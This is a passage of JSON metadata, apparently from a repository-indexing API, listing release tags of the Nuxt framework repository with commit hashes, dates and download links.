1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/ta